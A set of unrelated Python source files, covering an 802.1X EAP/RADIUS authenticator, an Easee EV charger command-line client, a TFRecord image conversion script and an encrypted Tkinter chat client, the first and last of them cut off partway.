def _handle_timeout(self):
self._state_transition(self.FAIL)
self._set_timeout(clear=True)
eap_message = FailureMessage(self.src_mac, 255)
self.auth_callback(self.src_mac, False)
self.eap_send_callback(self.src_mac, eap_message)
class Authenticator:
"""Authenticator to manage Authentication flow"""
HEARTBEAT_INTERVAL = 3
IDLE_TIME = 9
RETRY_COUNT = 3
RADIUS_PORT = 1812
EAPOL_IDLE_TIME = 180
def __init__(self, config_file):
self.state_machines = {}
self.results = {}
self.eap_module = None
self.radius_module = None
self.logger = utils.get_logger('Authenticator')
self._config_file = config_file
self._threads = []
self._radius_socket_info = None
self._radius_secret = None
self._radius_id = None
self._interface = None
self._idle_time = None
self._max_retry_count = None
self._current_timeout = None
self._debug = False
self._setup()
def _load_config(self):
with open(self._config_file, 'r') as file_stream:
full_config = json.load(file_stream)
config = full_config.get('modules').get('dot1x')
self._debug = config.get('debug')
if self._debug:
utils.enable_debug_logs(self.logger)
self.logger.debug('Loaded config from %s:\n %s', self._config_file, config)
self._interface = config.get('interface', utils.get_interface_name())
radius_config = config.get('radius_server', {})
radius_socket_info = radius_config.get('radius_socket_info', {})
listen_ip = radius_socket_info.get('listen_ip', utils.get_interface_ip(self._interface))
listen_port = radius_socket_info.get('listen_port', 0)
remote_ip = radius_socket_info.get('remote_ip', '127.0.0.1')
remote_port = radius_socket_info.get('remote_port', self.RADIUS_PORT)
self._radius_socket_info = RadiusSocketInfo(listen_ip, listen_port, remote_ip, remote_port)
self._radius_secret = radius_config.get('secret', 'SECRET')
self._radius_id = radius_config.get('id', utils.get_interface_mac(self._interface))
def _setup(self):
self._load_config()
self.radius_module = RadiusModule(
self._radius_socket_info, self._radius_secret,
self._radius_id, self.received_radius_response)
self.eap_module = EapModule(self._interface, self.received_eap_request)
if self._debug:
utils.enable_debug_logs(self.radius_module.logger)
utils.enable_debug_logs(self.eap_module.logger)
# TODO: Take value from config and then revert to default
interval = self.HEARTBEAT_INTERVAL
# TODO: Take value from config and then revert to default
self._idle_time = self.IDLE_TIME
self._max_retry_count = self.RETRY_COUNT
self.sm_timer = HeartbeatScheduler(interval)
self.sm_timer.add_callback(self.handle_sm_timeout)
self._current_timeout = time.time() + self.EAPOL_IDLE_TIME
def start_threads(self):
self.logger.info('Starting SM timer')
self.sm_timer.start()
self.logger.info('Listening for EAP and RADIUS.')
def build_thread(method):
self._threads.append(threading.Thread(target=method))
build_thread(self.radius_module.receive_radius_messages)
build_thread(self.radius_module.send_radius_messages)
build_thread(self.eap_module.receive_eap_messages)
build_thread(self.eap_module.send_eap_messages)
for thread in self._threads:
thread.start()
for thread in self._threads:
thread.join()
self.logger.info('Done listening for EAP and RADIUS packets.')
def _end_authentication(self):
self.logger.info('Stopping timer')
if self.sm_timer:
self.sm_timer.stop()
self.logger.info('Shutting down modules.')
self.radius_module.shut_down_module()
self.eap_module.shut_down_module()
def received_eap_request(self, src_mac, eap_message, is_eapol):
if is_eapol:
if not (src_mac in self.state_machines or src_mac in self.results):
self.logger.info('Starting authentication for %s' % (src_mac))
auth_mac = self.eap_module.get_auth_mac()
state_machine = AuthStateMachine(
src_mac, auth_mac,
self._idle_time, self._max_retry_count,
self.send_eap_response, self.send_radius_request,
self.process_test_result)
state_machine.initialize()
self.state_machines[src_mac] = state_machine
state_machine.received_eapol_start()
else:
self.logger.warning(
'Authentication for %s is in progress or has been completed' % (src_mac))
else:
state_machine = self.state_machines[src_mac]
state_machine.received_eap_request(eap_message)
def received_radius_response(self, src_mac, radius_attributes, packet_type):
eap_message = radius_attributes.eap_message
radius_state = radius_attributes.state
state_machine = self.state_machines[src_mac]
state_machine.received_radius_response(eap_message, radius_state, packet_type)
def send_eap_response(self, src_mac, message=None):
if not message:
self.eap_module.send_eapol_response(src_mac)
else:
self.eap_module.send_eap_message(src_mac, message)
def send_radius_request(self, radius_packet_info):
self.radius_module.send_radius_packet(radius_packet_info)
def process_test_result(self, src_mac, is_success):
if is_success:
self.logger.info('Authentication successful for %s' % (src_mac))
else:
if src_mac:
self.logger.info('Authentication failed for %s' % (src_mac))
else:
self.logger.info('Authentication failed. Received no EAPOL packets.')
if src_mac:
self.results[src_mac] = is_success
self.state_machines.pop(src_mac)
# TODO: We currently finalize results as soon as we get a result for a src_mac.
# Needs to be changed if we support multiple devices.
self._end_authentication()
def run_authentication_test(self):
self.start_threads()
result_str = ""
test_result = ""
if not self.results:
result_str = "Authentication failed. No EAPOL messages received."
test_result = "skip"
else:
test_result = "pass"
for src_mac, is_success in self.results.items():
if is_success:
result = 'succeeded'
else:
result = 'failed'
test_result = "fail"
result_str += "Authentication for %s %s." % (src_mac, result)
return result_str, test_result
def handle_sm_timeout(self):
if not self.state_machines and self._current_timeout:
if time.time() > self._current_timeout:
self.process_test_result(None, False)
else:
for state_machine in self.state_machines.values():
state_machine.handle_timer()
def main():
authenticator = Authenticator()
print(authenticator.run_authentication_test())
if __name__ == '__main__':
main()
|
__main__.py
|
import asyncio
import json
import logging
import argparse
import threading
import sys
from typing import List
from .utils import lookup_charger_stream_id, lookup_equalizer_stream_id
from . import Easee, Charger, Site, Circuit, Equalizer, DatatypesStreamData
CACHED_TOKEN = "easee-token.json"
_LOGGER = logging.getLogger(__file__)
def add_input(queue):
queue.put_nowait(sys.stdin.read(1))
async def print_signalr(id, data_type, data_id, value):
type_str = DatatypesStreamData(data_type).name
if id[0] == "Q":
data_str = lookup_equalizer_stream_id(data_id)
else:
data_str = lookup_charger_stream_id(data_id)
print(f"SR: {id} data type {data_type} {type_str} data id {data_id} {data_str} value {value}")
def parse_arguments():
parser = argparse.ArgumentParser(description="Read data from your Easee EV installation")
parser.add_argument("-u", "--username", help="Username", required=True)
parser.add_argument("-p", "--password", help="Password", required=True)
parser.add_argument("-c", "--chargers", help="Get chargers information", action="store_true")
parser.add_argument("-s", "--sites", help="Get sites information", action="store_true")
parser.add_argument("-ci", "--circuits", help="Get circuits information", action="store_true")
parser.add_argument("-e", "--equalizers", help="Get equalizers information", action="store_true")
parser.add_argument(
"-a",
"--all",
help="Get all sites, circuits, equalizers and chargers information",
action="store_true",
)
parser.add_argument(
"-sum",
"--summary",
help="Get summary of sites, circuits, equalizers and chargers information",
action="store_true",
)
parser.add_argument("-l", "--loop", help="Loop charger data every 5 seconds", action="store_true")
parser.add_argument("-r", "--signalr", help="Listen to signalr stream", action="store_true")
parser.add_argument("--countries", help="Get active countries information", action="store_true")
parser.add_argument(
"-d",
"--debug",
help="Print debugging statements",
action="store_const",
dest="loglevel",
const=logging.DEBUG,
default=logging.WARNING,
)
parser.add_argument(
"-v",
"--verbose",
help="Be verbose",
action="store_const",
dest="loglevel",
const=logging.INFO,
)
args = parser.parse_args()
logging.basicConfig(
format="%(asctime)-15s %(name)-5s %(levelname)-8s %(message)s",
level=args.loglevel,
)
return args
# TODO: Add option to send in a cached token
# def token_read():
# try:
# with open(CACHED_TOKEN, "r") as token_file:
# return json.load(token_file)
# except FileNotFoundError:
# return None
# def token_write(token):
# with open(CACHED_TOKEN, "w") as token_file:
# json.dump(token, token_file, indent=2)
async def async_main():
args = parse_arguments()
_LOGGER.debug("args: %s", args)
easee = Easee(args.username, args.password)
if args.chargers:
chargers: List[Charger] = await easee.get_chargers()
await chargers_info(chargers)
if args.sites:
sites: List[Site] = await easee.get_sites()
await sites_info(sites)
if args.circuits:
sites: List[Site] = await easee.get_sites()
for site in sites:
await circuits_info(circuits=site.get_circuits())
if args.equalizers:
sites: List[Site] = await easee.get_sites()
for site in sites:
await equalizers_info(equalizers=site.get_equalizers())
if args.countries:
countries_active = await easee.get_active_countries()
print(json.dumps(countries_active, indent=2))
if args.all:
sites: List[Site] = await easee.get_sites()
await sites_info(sites)
for site in sites:
equalizers = site.get_equalizers()
await equalizers_info(equalizers)
circuits = site.get_circuits()
await circuits_info(circuits)
for circuit in circuits:
chargers = circuit.get_chargers()
await chargers_info(chargers)
if args.summary:
sites: List[Site] = await easee.get_sites()
circuits = List[Circuit]
chargers = List[Charger]
equalizers = List[Equalizer]
for site in sites:
print(
f" "
f" Site: {site.__getitem__('name')}"
f" (ID: {site.id}),"
f" {site.__getitem__('address')['street']},"
f" main fuse {site.__getitem__('ratedCurrent')}A"
f" "
)
equalizers = site.get_equalizers()
for equalizer in equalizers:
print(
f" "
f" Equalizer: #{equalizer.__getitem__('name')}"
f" (ID: {equalizer.id})"
f" SiteID: #{equalizer.__getitem__('siteId')}"
f" CircuitId: #{equalizer.__getitem__('circuitId')}"
f" "
)
circuits = site.get_circuits()
for circuit in circuits:
print(
f" "
f" Circuit: #{circuit.__getitem__('circuitPanelId')}"
f" {circuit.__getitem__('panelName')}"
f" (ID: {circuit.id})"
f" {circuit.__getitem__('ratedCurrent')}A"
f" "
)
chargers = circuit.get_chargers()
for charger in chargers:
state = await charger.get_state()
config = await charger.get_config()
print(
f" "
f" Charger: {charger.__getitem__('name')}"
f" (ID: {charger.id}),"
f" enabled: {config.__getitem__('isEnabled')}"
f" online: {state.__getitem__('isOnline')}"
f" version: {state.__getitem__('chargerFirmware')}"
f" voltage: {round(state.__getitem__('voltage'),1)}"
f" current: {round(state.__getitem__('outputCurrent'),1)}"
f" "
)
print(f"\n\nFound {len(sites)} site(s), {len(circuits)} circuit(s) and {len(chargers)} charger(s).")
if args.loop:
sites: List[Site] = await easee.get_sites()
for site in sites:
circuits = site.get_circuits()
for circuit in circuits:
chargers = circuit.get_chargers()
try:
header = True
while True:
for charger in chargers:
await charger_loop(charger, header)
header = False
await asyncio.sleep(5)
except KeyboardInterrupt as e: # noqa
# Close connection on user interuption
print("Interrupted by user")
await easee.close()
except Exception as e:
print(e)
await easee.close()
if args.signalr:
chargers: List[Charger] = await easee.get_chargers()
equalizers = []
sites: List[Site] = await easee.get_sites()
for site in sites:
equalizers_site = site.get_equalizers()
for equalizer in equalizers_site:
equalizers.append(equalizer)
for charger in chargers:
await easee.sr_subscribe(charger, print_signalr)
for equalizer in equalizers:
await easee.sr_subscribe(equalizer, print_signalr)
queue = asyncio.Queue(1)
input_thread = threading.Thread(target=add_input, args=(queue,))
input_thread.daemon = True
input_thread.start()
while True:
await asyncio.sleep(1)
if queue.empty() is False:
# print "\ninput:", input_queue.get()
break
await easee.close()
async def chargers_info(chargers: List[Charger]):
print("\n\n****************\nCHARGERS\n****************")
data = []
for charger in chargers:
state = await charger.get_state()
config = await charger.get_config()
schedule = await charger.get_basic_charge_plan()
week_schedule = await charger.get_weekly_charge_plan()
ch = charger.get_data()
ch["state"] = state.get_data()
ch["config"] = config.get_data()
if schedule is not None:
ch["schedule"] = schedule.get_data()
if week_schedule is not None:
ch["week_schedule"] = week_schedule.get_data()
data.append(ch)
print(json.dumps(data, indent=2))
async def sites_info(sites: List[Site]):
print("\n\n****************\nSITES\n****************")
data = []
for site in sites:
data.append(site.get_data())
print(json.dumps(data, indent=2))
async def circuits_info(circuits: List[Circuit]):
print("\n\n****************\nCIRCUITS\n****************")
data = []
for circuit in circuits:
data.append(circuit.get_data())
print(json.dumps(data, indent=2))
async def equalizers_info(equalizers: List[Equalizer]):
print("\n\n****************\nEQUALIZERS\n****************")
data = []
for equalizer in equalizers:
eq = equalizer.get_data()
state = await equalizer.get_state()
config = await equalizer.get_config()
eq["state"] = state.get_data()
eq["config"] = config.get_data()
data.append(eq)
print(
json.dumps(
data,
indent=2,
)
)
async def charger_loop(charger: Charger, header=False):
"""Return the state attributes."""
# await charger.async_update()
state = await charger.get_state()
# config = await charger.get_config() # not used yet
if header:
print(str_fixed_length("NAME", 15), end=" ")
print(str_fixed_length("OPMODE", 20), end=" ")
print(str_fixed_length("ONLINE", 7), end=" ")
print(str_fixed_length("POWER", 7), end=" ")
print(str_fixed_length("OUTCURR", 10), end=" ")
print(str_fixed_length("IN_T2", 10), end=" ")
print(str_fixed_length("IN_T3", 10), end=" ")
print(str_fixed_length("IN_T4", 10), end=" ")
print(str_fixed_length("IN_T5", 10), end=" ")
print(str_fixed_length("VOLTAGE", 10), end=" ")
print(str_fixed_length("kWh", 10), end=" ")
print(str_fixed_length("RATE", 10), end=" ")
print(str_fixed_length("REASON", 25), end=" ")
print(" ")
print(str_fixed_length(f"{charger.name}", 15), end=" ")
print(str_fixed_length(f"{state.__getitem__('chargerOpMode')}", 20), end=" ")
print(str_fixed_length(f"{state.__getitem__('isOnline')}", 7), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('totalPower'),2)}kW", 7), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('outputCurrent'),1)}A", 10), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('inCurrentT2'),1)}A", 10), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('inCurrentT3'),1)}A", 10), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('inCurrentT4'),1)}A", 10), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('inCurrentT5'),1)}A", 10), end=" ")
print(str_fixed_length(f"{round(state.__getitem__('voltage'),1)}V", 10), end=" ")
print(
str_fixed_length(f"{round(state.__getitem__('sessionEnergy'),2)}kWh", 10),
end=" ",
)
print(
str_fixed_length(f"{round(state.__getitem__('energyPerHour'),2)}kWh/h", 10),
end=" ",
)
print(str_fixed_length(f"{str(state.__getitem__('reasonForNoCurrent'))}", 25), end=" ")
print(" ")
def str_fixed_length(myStr, length: int):
while len(myStr) < length:
myStr = myStr + " "
if len(myStr) > length:
myStr = myStr[0:length]
return myStr
def main():
asyncio.run(async_main())
if __name__ == "__main__":
import time
s = time.perf_counter()
main()
elapsed = time.perf_counter() - s
print(f"{__file__} executed in {elapsed:0.2f} seconds.")
|
tfrecord.py
|
# coding:utf-8
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer. start from "class_label_base"
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If you data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
import logging
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
value = tf.compat.as_bytes(value)
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(text),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return '.png' in filename
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with open(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
logging.info('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards, command_args):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s_%s_%.5d-of-%.5d.tfrecord' % (command_args.dataset_name, name, shard, num_shards)
output_file = os.path.join(command_args.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
logging.info('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
logging.info('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
logging.info('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards, command_args):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), command_args.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
logging.info('Launching %d threads for spacings: %s' % (command_args.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards, command_args)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
logging.info('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file, command_args):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
logging.info('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
"""非常重要,这里我们调整label从0开始以符合定义"""
label_index = command_args.class_label_base
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
logging.info('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
logging.info('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
# print(labels)
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file, command_args):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file, command_args)
_process_image_files(name, filenames, texts, labels, num_shards, command_args)
def check_and_set_default_args(command_args):
if not(hasattr(command_args, 'train_shards')) or command_args.train_shards is None:
command_args.train_shards = 5
if not(hasattr(command_args, 'validation_shards')) or command_args.validation_shards is None:
command_args.validation_shards = 5
if not(hasattr(command_args, 'num_threads')) or command_args.num_threads is None:
command_args.num_threads = 5
if not(hasattr(command_args, 'class_label_base')) or command_args.class_label_base is None:
command_args.class_label_base = 0
if not(hasattr(command_args, 'dataset_name')) or command_args.dataset_name is None:
command_args.dataset_name = ''
assert not command_args.train_shards % command_args.num_threads, (
'Please make the command_args.num_threads commensurate with command_args.train_shards')
assert not command_args.validation_shards % command_args.num_threads, (
'Please make the command_args.num_threads commensurate with '
'command_args.validation_shards')
assert command_args.train_directory is not None
assert command_args.validation_directory is not None
assert command_args.labels_file is not None
assert command_args.output_directory is not None
def main(command_args):
"""
command_args:需要有以下属性:
command_args.train_directory 训练集所在的文件夹。这个文件夹下面,每个文件夹的名字代表label名称,再下面就是图片。
command_args.validation_directory 验证集所在的文件夹。这个文件夹下面,每个文件夹的名字代表label名称,再下面就是图片。
command_args.labels_file 一个文件。每一行代表一个label名称。
command_args.output_directory 一个文件夹,表示最后输出的位置。
command_args.train_shards 将训练集分成多少份。
command_args.validation_shards 将验证集分成多少份。
command_args.num_threads 线程数。必须是上面两个参数的约数。
command_args.class_label_base 很重要!真正的tfrecord中,每个class的label号从多少开始,默认为0(在models/slim中就是从0开始的)
command_args.dataset_name 字符串,输出的时候的前缀。
图片不可以有损坏。否则会导致线程提前退出。
"""
check_and_set_default_args(command_args)
logging.info('Saving results to %s' % command_args.output_directory)
# Run it!
_process_dataset('validation', command_args.validation_directory,
command_args.validation_shards, command_args.labels_file, command_args)
_process_dataset('train', command_args.train_directory,
command_args.train_shards, command_args.labels_file, command_args)
|
chatClient.py
|
#! /usr/bin/env python3
import os
import sys
import select
import socket
import pickle
import getpass
import threading
import time
from datetime import datetime
from tkinter import *
# Adding APIs directory to python system path
# sys.path.insert(-1, os.path.join(os.path.dirname
# (os.path.realpath(__file__)), 'APIs'))
# Local modules
from APIs.logging import Log
from APIs.security import *
GUI_OBJ = None
KEY = None
class GUI(object):
def __init__(self, master, network_obj):
global GUI_OBJ
self.master = master
self.network = network_obj
self.txt_input = Text(self.master, width=60, height=5)
self.txt_disp = Text(self.master, width=60, height=15, bg='light grey')
self.txt_input.bind('<Return>', self.get_entry)
self.txt_disp.configure(state='disabled')
self.txt_input.focus()
self.txt_disp.pack()
self.txt_input.pack()
self.flag = True
GUI_OBJ = self
def init_canvas(self):
self.canvas = Canvas(root, width=730, height=600)
self.canvas.pack(fill="both", expand=True)
def init_frame(self):
self.frame_left = Frame(self.canvas, height=400, width=200)
self.frame_right = Frame(self.canvas, width=500)
self.frame_right_chat_show = Frame(self.frame_right)
self.frame_right_chat_input = Frame(self.frame_right, width=460)
self.frame_right_chat_input_buttons = Frame(self.frame_right, width=40)
self.frame_left.pack(fill=Y, side='left')
self.frame_right.pack(fill=Y, side='left')
self.frame_right_chat_show.pack(fill=X, side='top')
self.frame_right_chat_input.pack(side='left')
self.frame_right_chat_input_buttons.pack(side='left')
# def init_textbox(self):
def update(self, msg):
'''
This method updates chat window
'''
msg = '\n' + msg
self.txt_disp.configure(state='normal')
self.txt_disp.insert(END, msg)
self.txt_disp.see(END)
self.txt_disp.configure(state='disabled')
def get_entry(self, *arg):
''' Gets input from the input field and uses
network object to send message to the server.
Finally clears input field to enter msg.
'''
# print(self.thread_name + ">> " + str(self.txt_input.get('1.0',END)))
msg_snd = self.txt_input.get('1.0', END)
msg_snd = msg_snd.strip('\n')
self.network.send_msg(msg_snd)
msg_snd = '<YOU> ' + msg_snd
self.update(msg_snd)
self.txt_input.delete('1.0', END)
def get_msg(self, *arg):
''' This method is being used by separate thread
to keep on receiving messages from the server and
update chat window.
'''
while True:
msg_rcv = self.network.get_msg()
if msg_rcv:
msg_rcv = msg_rcv.strip('\n')
print('-' * 60)
print(msg_rcv)
self.update(msg_rcv)
class Network():
def __init__(self, thread_name, SRV_IP='', SRV_PORT=''):
''' Constructor to initialise network
connectivity between the client and server.
'''
self.SRV_IP = SRV_IP
self.SRV_PORT = int(SRV_PORT)
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect((self.SRV_IP, self.SRV_PORT))
self.KEY_FLAG = False
self.priv_key = None
self.pub_key = None
def genRSA(self, *args):
# Generate Private and Public key for particular session
logging.log("Generating private and public key")
self.priv_key, self.pub_key = RSA_.genRSA()
logging.log("Keys generation completed.")
logging.log(self.pub_key.exportKey())
def initEncryption(self, userName):
global KEY
# Generate Private and Public key for particular session
#logging.log("Generating private and public key for %s", userName)
#priv, pub = RSA_.genRSA()
#logging.log("Keys generation completed.")
#logging.log(pub.exportKey())
# Prepare data for serialization as tuple
# can't be transmitted over network.
msg_send = (userName, self.pub_key)
msg_send = pickle.dumps(msg_send)
self.client.send(msg_send)
logging.log("User name along with public key has been sent to the server.")
# Wait for the server to send symmetric key
EnSharedKey = self.client.recv(1024)
EnSharedKey = pickle.loads(EnSharedKey)
print(EnSharedKey)
KEY = RSA_.decrypt(self.priv_key, EnSharedKey)
print(KEY)
if KEY:
logging.log("Unique key has been received")
self.KEY_FLAG = True
logging.log("Secure connection has been established.")
def get_msg(self):
if KEY != None:
msg_rcv = AES_.decrypt(KEY.encode(), self.client.recv(20000))
return msg_rcv
def send_msg(self, msg_snd):
if KEY is None:
# Send (userName, RSA_PublicKey) to the server
# to get encrypted symmetric key for further encryption.
self.initEncryption(msg_snd)
return
try:
print(msg_snd)
result = self.client.send(AES_.encrypt(KEY.encode(), msg_snd))
print("Bytes sent: ", result)
except Exception as e:
print(e)
GUI.update(GUI_OBJ, "Not connected to the server")
# Outsite class functions
def connection_thread(*args):
root = args[0]
retry_count = 0
gui_flag = False
while True:
try:
network = Network('network_thread', '127.0.0.1', 8080)
if gui_flag:
gui.network = network
if not gui_flag:
gui = GUI(root, network)
logging.log('Connected to the server')
gui.update('Connected to the server')
gui.update('Enter your name.')
break
except Exception as e:
msg = "[Retry {}] {}".format(retry_count+1, e)
logging.log(msg)
retry_count += 1
if retry_count == 1:
gui = GUI(root, None)
